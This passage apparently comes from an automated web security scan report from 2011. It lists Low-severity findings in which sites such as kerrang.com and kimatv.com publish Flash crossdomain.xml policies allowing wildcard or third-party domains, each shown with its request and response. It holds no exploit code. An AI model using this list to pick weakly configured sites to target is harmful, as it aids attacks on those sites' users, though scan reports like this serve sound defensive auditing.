<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.171. http://www.kerrang.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kerrang.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kerrang.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:18 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 25 Mar 2010 11:53:49 GMT
ETag: "8111f9-f4-b3278d40"
Accept-Ranges: bytes
Content-Length: 244
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=900
Expires: Wed, 04 May 2011 01:22:18 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
       
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       
    <cross-domain-policy>
       
    <allow-access-from domain="*.kerrang.com" />
...[SNIP]...

6.172. http://www.kimatv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kimatv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kimatv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 15:57:06 GMT
X-Server-Name: sj-c14-r8-u22-b4
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 03:34:50 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.173. http://www.lakewood.cc/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lakewood.cc
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lakewood.cc

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:42:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Last-Modified: Thu, 14 Apr 2011 00:44:32 GMT
ETag: "{A32CB158-26C3-4BD5-95DF-F58DB84C804D},9"
ResourceTag: rt:A32CB158-26C3-4BD5-95DF-F58DB84C804D@00000000009
Content-Type: text/xml
Exires: Tue, 19 Apr 2011 03:42:25 GMT
Cache-Control: private,max-age=0
Content-Length: 295
Public-Extension: http://schemas.microsoft.com/repl-2

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="joelosteen.com"/>
<allow-access-from domain="*.joelosteen.com"/>
<allow-access-from domain="media.lakewood.org.edgesuite.net" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

6.174. http://www.ldssingles.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ldssingles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ldssingles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:26 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA PRE"
Content-Length: 273
Keep-Alive: timeout=15, max=28
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>    <site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.ldssingles.com" />
...[SNIP]...

6.175. http://www.livedoor.biz/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livedoor.biz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livedoor.biz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:42 GMT
Server: Apache
Last-Modified: Mon, 07 Dec 2009 12:05:44 GMT
ETag: "25c06ce-164-47a2246e91600"
Accept-Ranges: bytes
Content-Length: 356
P3P: CP="BUS OUR PHY STP ADM CUR DEV PSA PSD"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blogcms.jp" />
<allow-access-from domain="*.livedoor.com" />
<allow-access-from domain="*.floq.jp" />
<allow-access-from domain="*.deco-town.jp" />
...[SNIP]...

6.176. http://www.livemanplay.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livemanplay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livemanplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:19 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

6.177. http://www.luckymn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.luckymn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luckymn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:01 GMT
Server: Apache
Last-Modified: Mon, 08 Feb 2010 22:14:07 GMT
ETag: "300cecad-236-47f1e1ea949c0"
Accept-Ranges: bytes
Content-Length: 566
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mymegamillionsdream.com" />
<allow-access-from domain="*.startribune.com" />
<allow-access-from domain="*.twincities.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.pogo.com" />
<allow-access-from domain="*.minnpost.com" />
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="*.collemcvoy.com" />
...[SNIP]...

6.178. http://www.manoramaonline.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manoramaonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manoramaonline.com

Response

HTTP/1.0 200 OK
Content-Length: 272
Content-Type: text/xml
Last-Modified: Fri, 24 Apr 2009 05:07:43 GMT
Accept-Ranges: bytes
ETag: "c5304f999ac4c91:dcfc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.manoramaonline.com"/>
<allow-access-from domain="www.manoramanews.com"/>
...[SNIP]...

6.179. http://www.menshealth.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.menshealth.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=191
Date: Wed, 04 May 2011 02:08:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

6.180. http://www.mkt859.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mkt859.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mkt859.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:20 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 18:37:10 GMT
ETag: "1cdc-ce0-48df51ecb8180"
Accept-Ranges: bytes
Content-Length: 3296
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<!-- Cross Domain File Flash data connections to Silverpop.
SUBVERSIONED
-->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="cisco.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="enjoyuserexperience.com" />
<allow-access-from domain="*.enjoyuserexperience.com" />
<allow-access-from domain="smileassessment.vmlapps.com" />
<allow-access-from domain="invisalign.com" />
<allow-access-from domain="winstage.vml.com" />
<allow-access-from domain="resp.survey01.net" />
<allow-access-from domain="www.atptennis.com" />
<allow-access-from domain="www.atptennis.atponline.net" />
<allow-access-from domain="vml.com"/>
<allow-access-from domain="*.vml.com"/>
<allow-access-from domain="vmlapps.com"/>
<allow-access-from domain="*.vmlapps.com"/>
<allow-access-from domain="*.invisalign.com"/>
<allow-access-from domain="publishinvisalign"/>
<allow-access-from domain="www.atpworldtour.com"/>
<allow-access-from domain="your-majesty.com"/>
<allow-access-from domain="*.your-majesty.com"/>
<allow-access-from domain="sethfloydjr.com"/>
<allow-access-from domain="*.content.ogilvy.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
<allow-access-from domain="*.gstatic.com" />
...[SNIP]...
<allow-access-from domain="*.scholieren.tv"/>
...[SNIP]...
<allow-access-from domain="*.yourfuture.tv"/>
...[SNIP]...

6.181. http://www.moikrewni.pl/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moikrewni.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moikrewni.pl

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:33:55 GMT
Content-Type: application/xml;charset=UTF-8
Connection: close
Set-Cookie: JSESSIONID=BE9687BE3483E573C59586504BC50B2F; Path=/
ETag: W/"1879-1266001692000"
Last-Modified: Fri, 12 Feb 2010 19:08:12 GMT
Content-Language: pl
Content-Length: 1879
X-XSS-Protection: 0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="verwandt.de" />
<allow-access-from domain="*.verwandt.de" />
<allow-access-from domain="verwant.nl" />
<allow-access-from domain="*.verwant.nl" />
<allow-access-from domain="familleunie.fr" />
<allow-access-from domain="*.familleunie.fr" />
<allow-access-from domain="verwandt.at" />
<allow-access-from domain="*.verwandt.at" />
<allow-access-from domain="verwandt.ch" />
<allow-access-from domain="*.verwandt.ch" />
<allow-access-from domain="parentistretti.it" />
<allow-access-from domain="*.parentistretti.it" />
<allow-access-from domain="moikrewni.pl" />
<allow-access-from domain="*.moikrewni.pl" />
<allow-access-from domain="miparentela.com" />
<allow-access-from domain="*.miparentela.com" />
<allow-access-from domain="meusparentes.com.pt" />
<allow-access-from domain="*.meusparentes.com.pt" />
<allow-access-from domain="meusparentes.com.br" />
<allow-access-from domain="*.meusparentes.com.br" />
<allow-access-from domain="dynastree.com" />
<allow-access-from domain="*.dynastree.com" />
<allow-access-from domain="dynastree.ca" />
<allow-access-from domain="*.dynastree.ca" />
<allow-access-from domain="dynastree.co.uk" />
<allow-access-from domain="*.dynastree.co.uk" />
<allow-access-from domain="*.semyaonline.ru" />
<allow-access-from domain="semyaonline.ru" />
<allow-access-from domain="*.akrabaonline.com" />
<allow-access-from domain="akrabaonline.com" />
<allow-access-from domain="*.dynas-tree.com" />
<allow-access-from domain="dynas-tree.com" />
<allow-access-from domain="verwandt4jtest.ics.int" />
<allow-access-from domain="*.verwandt4jtest.ics.int" />
...[SNIP]...

6.182. http://www.mygazines.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mygazines.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mygazines.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _MGZ_=72uhjjr0ma7419ipmi1l740im3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Last-Modified: Tue, 03 May 2011 15:02:14 GMT
Content-Length: 239
Connection: close
Content-Type: text/xml

<cross-domain-policy><allow-access-from domain="*.mygazines.com" secure="false"/><allow-access-from domain="*.mygazines.com" to-ports="80,443"/><allow-http-request-headers-from domain="*.mygazines.com
...[SNIP]...

6.183. http://www.neogen.ro/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.neogen.ro
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neogen.ro

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:19 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 16:56:20 GMT
ETag: "678481-fd-4a06b1ae4f500"
Accept-Ranges: bytes
Content-Length: 253
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.adocean.pl" />
<allow-access-from domain="*.ineogen.ro" />
<allow-access-from domain="dzserv.neogen.ro" />
...[SNIP]...

6.184. http://www.newtondailynews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newtondailynews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newtondailynews.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 11 Dec 2008 11:02:36 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.241-release4
